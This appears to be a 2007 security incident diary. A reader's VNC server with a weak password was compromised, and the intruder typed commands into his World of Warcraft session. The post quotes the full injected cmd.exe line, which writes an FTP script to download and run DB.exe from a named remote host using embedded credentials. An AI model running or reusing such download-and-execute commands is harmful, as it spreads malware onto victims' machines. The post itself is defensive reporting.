Last Updated: 2007-11-11 23:16:23 UTC
by Koon Yaw Tan (Version: 2)
Our reader Oscar shared with us that when he was playing world of warcraft, he suddenly lost control and got some "strange" lines appearing (injected command strings displayed within his WoW session). Below is a screenshot.
As he is also running a VNC server with a fairly easy guess password, this is what he got a couple of files:
If you have encountered similar experience, let us know.
Lesson learnt: If you put any services expose to Internet without proper protection, you are asking for trouble, unless of course you are running a honeypot/honeynet. Thanks Oscar for sharing.
Oscar wrote back and gave us a detailed description of what happened. Here is what he said:
So, it was the typical night, me playing WoW at 12:30 in the morning (Central time) and I had just set my hearthstone to Shattrath, which everyone knows is the best spot to set it.
So I was walking back out of the hearth spot, and my character started spinning around in circles, then my charter said "aaaaaaaaa"
then, what looked like code was also spoken by my character "%systemroot%\system32\cmd.exe and then /c echo open ftpd.xbytez.com.ar 21 >> ik &echo user B0t _A159753b >> ik &echo binary >> ik &echo get DB.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik&DB.exe &exit So, This seemed curious, since I wasn't even on a windows platform, so I manually logged into the ftp server, did a mget * and thought the SANS folks would be interested in these files.
Now, how did they get in? My guess here is that I had just installed the latest and greatest version of my favorite companies OS, and I turned a feature called Screen sharing, and also X'd the option to allow VNC users to logon with a password. Well, the password i picked was pretty guessable. When I logged into previously mentioned ftp site, a program there was called vnckiller.exe So i would aseume thats how they got in. Lesson for the Day: Even if your turning on a feature for testing purposes, don't choose a easy password, as most likely, you'll forget to turn off this feature, and be rooted. Thank goodness I wasn't
A question for our readers: has anybody seen this happen to their session in WoW or any other virtual world simulation?
Edwin wrote us and said that he's see the same problem before. He pointed to
http://www.securityfocus.com/archive/1/433994/30/0/threaded for details on the exploit.